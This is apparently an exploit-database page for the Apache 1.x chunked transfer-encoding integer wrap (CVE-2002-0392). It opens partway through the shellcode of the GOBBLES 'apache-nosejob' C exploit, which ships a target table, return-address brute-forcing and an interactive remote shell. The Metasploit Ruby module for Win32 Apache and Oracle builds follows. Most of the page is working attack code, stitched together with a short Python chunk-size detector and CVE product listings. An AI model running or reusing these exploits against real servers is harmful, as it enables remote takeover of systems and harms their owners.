"\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
"\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
"\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
"\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
struct {
char *type; /* description for newbie penetrator */
int delta; /* delta thingie! */
u_long retaddr; /* return address */
int repretaddr; /* we repeat retaddr thiz many times in the buffer */
int repzero; /* and \0'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80f3a00, 6, 36 },
{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80a7975, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.20", -146, 0xcfa00, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.22", -146, 0x8f0aa, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.24", -146, 0x90600, 6, 36 },
{ "OpenBSD 3.0 x86 / Apache 1.3.24 #2", -146, 0x98a00, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.20", -146, 0x8f2a6, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.23", -146, 0x90600, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24", -146, 0x9011a, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2", -146, 0x932ae, 6, 36 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146, 0x1d7a00, 6, 36 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)", -90, 0x80eda00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", -90, 0x80efa00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", -90, 0x80efa00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)", -90, 0x80efa00, 5, 42 },
{ "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)", -90, 0x80efa00, 5, 42 },
}, victim;
void usage(void) {
int i;
printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n");
printf(" -h host[:port]\tHost to penetrate\n");
printf(" -t #\t\t\tTarget id.\n");
printf(" Bruteforcing options (all required, unless -o is used!):\n");
printf(" -o char\t\tDefault values for the following OSes\n");
printf(" \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
printf(" -b 0x12345678\t\tBase address used for bruteforce\n");
printf(" \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
printf(" -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
printf(" \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
printf(" -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
printf(" \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
printf(" -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
printf(" \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
printf(" Optional stuff:\n");
printf(" -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n");
printf(" -c cmdz\t\tCommands to execute when our shellcode replies\n");
printf(" \t\t\taka auto0wncmdz\n");
printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n");
printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
printf(" ID / Return addr / Target specification\n");
for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
printf("% 3d / 0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type);
exit(1);
}
int main(int argc, char *argv[]) {
char *hostp = NULL, *portp = "80", *cmdz = DEFAULT_CMDZ; /* hostp stays NULL if -h is missing */
char buf[512], *expbuf, *p; /* plain char: these go through str*/snprintf() */
int i, j, lport, sock;
int bruteforce, owned, progress, sc_timeout = 5;
int responses, shown_length = 0;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
if(argc < 4)
usage();
bruteforce = 0;
memset(&victim, 0, sizeof(victim));
while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
switch(i) {
/* required stuff */
case 'h':
hostp = strtok(optarg, ":");
if((portp = strtok(NULL, ":")) == NULL)
portp = "80";
break;
/* predefined targets */
case 't':
if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
printf("Invalid target\n");
return -1;
}
memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
break;
/* bruteforce! */
case 'b':
bruteforce++;
victim.type = "Custom target";
victim.retaddr = strtoul(optarg, NULL, 16);
printf("Using 0x%lx as the baseadress while bruteforcing..\n", victim.retaddr);
break;
case 'd':
victim.delta = atoi(optarg);
printf("Using %d as delta\n", victim.delta);
break;
case 'r':
victim.repretaddr = atoi(optarg);
printf("Repeating the return address %d times\n", victim.repretaddr);
break;
case 'z':
victim.repzero = atoi(optarg);
printf("Number of zeroes will be %d\n", victim.repzero);
break;
case 'o':
bruteforce++;
switch(*optarg) {
case 'f':
victim.type = "FreeBSD";
victim.retaddr = 0x80a0000;
victim.delta = -150;
victim.repretaddr = 6;
victim.repzero = 36;
break;
case 'o':
victim.type = "OpenBSD";
victim.retaddr = 0x80000;
victim.delta = -146;
victim.repretaddr = 6;
victim.repzero = 36;
break;
case 'n':
victim.type = "NetBSD";
victim.retaddr = 0x080e0000;
victim.delta = -90;
victim.repretaddr = 5;
victim.repzero = 42;
break;
default:
printf("[-] Better luck next time!\n");
break;
}
break;
/* optional stuff */
case 'w':
sc_timeout = atoi(optarg);
printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout);
break;
case 'c':
cmdz = optarg;
break;
default:
usage();
break;
}
}
if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {
printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n");
return -1;
}
printf("[*] Resolving target host.. ");
fflush(stdout);
he = gethostbyname(hostp);
if(he)
memcpy(&ia.s_addr, he->h_addr, 4);
else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
printf("There'z no %s on this side of the Net!\n", hostp);
return -1;
}
printf("%s\n", inet_ntoa(ia));
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
/* skip invalid return addresses */
if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
continue;
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(atoi(portp));
if(!progress)
printf("[*] Connecting.. ");
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror("connect()");
exit(1);
}
if(!progress)
printf("connected!\n");
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
+ ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero
+ 1024) * REP_POPULATOR));
PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("\r\n");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < victim.repretaddr; j++) {
*p++ = victim.retaddr & 0xff;
*p++ = (victim.retaddr >> 8) & 0xff;
*p++ = (victim.retaddr >> 16) & 0xff;
*p++ = (victim.retaddr >> 24) & 0xff;
}
PUT_BYTES(victim.repzero, 0);
PUT_STRING("\r\n");
}
PUT_STRING("Transfer-Encoding: chunked\r\n");
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
PUT_STRING(buf);
if(!shown_length) {
printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
shown_length = 1;
}
write(sock, expbuf, p - expbuf);
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
for(i = 0; i < 40; i ++)
printf(" ");
printf("\n");
if(bruteforce)
putchar(';');
}
else
putchar(((rand()>>8)%2)? 'P': 'p');
fflush(stdout);
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = sc_timeout;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
break;
if(n >= 1)
{
if(!owned)
{
for(i = 0; i < n; i ++)
if(buf[i] == 'G')
responses ++;
else
responses = 0;
if(responses >= 2)
{
owned = 1;
write(sock, "O", 1);
write(sock, cmdz, strlen(cmdz));
printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n", victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero);
printf("Experts say this isn't exploitable, so nothing will happen now: ");
fflush(stdout);
}
} else
write(1, buf, n);
}
}
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
write(sock, buf, n);
}
}
if(!owned)
break;
}
free(expbuf);
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, "Ooops.. hehehe!\n");
return -1;
}
}
return 0;
}
Exploit Database EDB-ID : 16782
Publication date : 2010-07-06 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: apache_chunked.rb 9719 2010-07-07 17:38:59Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Win32 Chunked Encoding',
'Description' => %q{
This module exploits the chunked transfer integer wrap
vulnerability in Apache version 1.2.x to 1.3.24. This
particular module has been tested with all versions of the
official Win32 build between 1.3.9 and 1.3.24. Additionally,
it should work against most co-branded and bundled versions
of Apache (Oracle 8i, 9i, IBM HTTPD, etc).
You will need to use the Check() functionality to determine
the exact target version prior to launching the exploit. The
version of Apache bundled with Oracle 8.1.7 will not
automatically restart, so if you use the wrong target value,
the server will crash.
},
'Author' => [ 'hdm', 'jduck' ],
'Version' => '$Revision: 9719 $',
'References' =>
[
[ 'CVE', '2002-0392' ],
[ 'OSVDB', '838'],
[ 'BID', '5033' ],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],
],
'Privileged' => true,
'Platform' => 'win',
'Payload' =>
{
'Space' => 987,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
'MinNops' => 200,
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[ 'Windows Generic Bruteforce', {} ],
# Official Apache.org win32 builds
[ 'Apache.org Build 1.3.9->1.3.19',
{
'Ret' => 0x00401151,
'Pad' => [6,2,0,4,1,3,5,7]
}
],
[ 'Apache.org Build 1.3.22->1.3.24',
{
'Ret' => 0x00401141,
'Pad' => [2,6,0,4,1,3,5,7]
}
],
[ 'Apache.org Build 1.3.19->1.3.24',
{
'Ret' => 0x6ff6548d,
'Pad' => [2,6,0,4,1,3,5,7]
}
],
[ 'Apache.org Build 1.3.22',
{
'Ret' => 0x6ff762ac,
'Pad' => [2,6,0,4,1,3,5,7]
}
],
# Return to Win9xConHook.dll via call ebx
[ 'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
{
'Ret' => 0x1c0f13e5,
'Pad' => [2,6,0,4,1,3,5,7]
}
],
# Return to Win9xConHook.dll via call esi
[ 'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
{
'Ret' => 0x1c0f1033,
'Pad' => [2,6,0,4,1,3,5,7]
}
],
# Interesting return to PEB trick for Windows 2003 systems...
[ 'Windows 2003 English SP0',
{
'Ret' => 0x7ffc0638,
'Pad' => [2,6,5,4,1,3,0,7]
}
],
# Pop/Pop/Return on Windows 2000
[ 'Windows 2000 English',
{
'Ret' => 0x75022ac4,
'Pad' => [2,6,5,4,1,3,0,7]
}
],
# Oracle HTTPD: [ 8.1.7 ] (one shot)
# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
# OpenSSL/0.9.5a mod_perl/1.24
[ 'Oracle 8.1.7 Apache 1.3.12',
{
'Ret' => 0x1d84d42c,
'Pad' => [7]
}
],
# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
# OpenSSL/0.9.5a mod_perl/1.24
[ 'Oracle 9.1.0 Apache 1.3.12',
{
'Ret' => 0x10016061,
'Pad' => [5,6,0,4,1,3,2,7]
}
],
# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
[ 'Oracle 9.2.0 Apache 1.3.22',
{
'Ret' => 0x6ff6427a,
'Pad' => [5,6,0,4,1,3,2,7]
}
],
# Generic debugging targets
[ 'Debugging Target',
{
'Ret' => 0xcafebabe,
'Pad' => [0,1,2,3,4,5,6,7]
}
]
],
'DisclosureDate' => 'Jun 19 2002',
'DefaultTarget' => 0))
end
def check
response = send_request_raw({'uri' => '/'}, 5)
if response.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
end
http_fingerprint({ :response => response }) # Custom Server header matching
code = Exploit::CheckCode::Appears
case response['Server']
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
print_status("IBM backported the patch, this system is not vulnerable")
code = Exploit::CheckCode::Safe
when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
else
code = Exploit::CheckCode::Safe
end
if code == Exploit::CheckCode::Appears
print_status("Vulnerable server: #{response['Server']}")
else
print_status("Server is probably not vulnerable: #{response['Server']}")
end
return code
end
def auto_target
response = send_request_raw({'uri' => '/'}, 5)
if response.nil?
print_error("No response to request")
return [] # nothing to try when the server did not answer (local not yet assigned at this point)
end
http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection
targets_to_try = []
server_hdr = response['Server']
print_status("Server: #{server_hdr}")
case server_hdr
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
targets_to_try.push(targets[9])
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
targets_to_try.push(targets[10])
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
targets_to_try.push(targets[11])
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
# fall through
else
# check for apache version ranges
if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
version = $1
#print_status("Apache version: #{version}")
ver = version.split('.')
if (ver.length == 3)
major = ver[0].to_i
minor = ver[1].to_i
rev = ver[2].to_i
if (major == 1 and minor == 3)
targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
targets_to_try.push(targets[4]) if (rev == 22)
# Add the remaining targets, regardless of quality...
if (server_hdr =~ /Win32/)
# targets 4, 5, 6, 7
if (rev >= 17 and rev <= 24)
targets_to_try.push(targets[5])
targets_to_try.push(targets[6])
end
targets_to_try.push(targets[7])
targets_to_try.push(targets[8])
end
end
# Version 1.0 - 1.2, Fall through...
end
# ServerTokens setting isn't giving up enough information ... Might need to try?
end
# Not Apache? Fall through...
end
targets_to_try
end
#
# If auto, ask the auto_target function for a list of
# targets to try...
#
# If not auto, just try the selected target.
#
def exploit
if target_index == 0
targs = auto_target
print_status("Auto-targeting returned #{targs.length} candidates...")
targs.each_with_index { |targ, idx|
# Never try the debug target automatically :)
next if targ.name =~ /Debug/
exploit_target(targ)
}
else
exploit_target(target)
end
end
def exploit_target(target)
target['Pad'].each { |pad|
pattern =
rand_text_alphanumeric(3936) +
payload.encoded +
make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
rand_text_alphanumeric(pad)
# Move slightly further back to allow padding changes
pattern +=
"\xeb\xf0\xde\xad" +
[target.ret].pack('V')
# Create a chain of return addresses and reverse jumps
254.times { |x|
pattern +=
"\xeb\xf6\xbe\xef" +
[target.ret].pack('V')
}
# Even out the request length based on the padding value
# This is required to reliably hit the return address offset
pattern += rand_text_alphanumeric(8 - pad)
#
# Regardless of what return we hit, execution jumps backwards to the shellcode:
# _______________ _______________ ___________
# _________ _____________ | ________ | | ______ | | ______
# v | v | v v | | v v | | v v |
# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
#
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
# Build the request
send_request_raw({
'uri' => '/',
'headers' =>
{
'Transfer-Encoding' => "CHUNKED"
},
'data' => "FFFFFFF0 " + pattern,
}, 2)
# Check the handler
handler
}
end
end
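As an added defender-side example (not part of either exploit above, nor of Apache or Metasploit), the following Python walks a chunked request body the way Apache's hex-digit chunk-size parser does and flags any chunk size that turns negative when read as a signed 32-bit integer, which is the integer wrap both exploits rely on (the Metasploit module's `FFFFFFF0` token and apache-scalp's `%x` of a negative delta). The sample bodies are constructed, and the function names are chosen here.

```python
import re

# Leading run of hex digits: like Apache's chunk-size parsing, anything after
# the digits on the line (chunk extensions, stray bytes) is ignored.
HEX_PREFIX = re.compile(rb"^[0-9A-Fa-f]+")

# Constructed samples, not captured traffic. "metasploit_style" copies the
# chunk-size token the module above sends ("FFFFFFF0 "); "scalp_style" mimics
# apache-scalp's "%x" of its default FreeBSD delta (-150 -> ffffff6a);
# "benign" is an ordinary two-chunk body.
SAMPLES = {
    "metasploit_style": b"FFFFFFF0 " + b"A" * 64,
    "scalp_style": b"10\r\n" + b"B" * 16 + b"\r\n" + b"ffffff6a\r\n",
    "benign": b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n",
}


def signed32(value: int) -> int:
    """Read an unsigned chunk size as a 32-bit signed int, which is how the
    vulnerable Apache 1.3 chunk handling effectively treated it."""
    value &= 0xFFFFFFFF
    return value - 0x1_0000_0000 if value & 0x8000_0000 else value


def walk_chunks(body: bytes, max_chunks: int = 64):
    """Yield (unsigned_size, signed_size) for each chunk-size line in body.
    Stops at a zero-size chunk, at a size the body cannot satisfy, or at a
    size that is negative as signed, since no real parser gets past those."""
    pos = 0
    for _ in range(max_chunks):
        line_end = body.find(b"\r\n", pos)
        if line_end < 0:
            line_end = len(body)
        match = HEX_PREFIX.match(body[pos:line_end])
        if not match:
            return
        size = int(match.group(0), 16)
        yield size, signed32(size)
        if size == 0 or signed32(size) < 0:
            return
        pos = line_end + 2 + size + 2  # chunk data plus its trailing CRLF
        if pos > len(body):
            return


def suspicious_chunk_sizes(body: bytes) -> list:
    """Chunk sizes that wrap negative as signed 32-bit: the condition both
    exploits above rely on and the thing a WAF or IDS rule should flag."""
    return [unsigned for unsigned, signed in walk_chunks(body) if signed < 0]
```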
Products Mentioned
Configuration 0
Apache>>Http_server >> Version From (including) 1.2.2 To (including) 1.3.24
Apache>>Http_server >> Version From (including) 2.0.0 To (including) 2.0.36
Configuration 0
Debian>>Debian_linux >> Version 2.2
References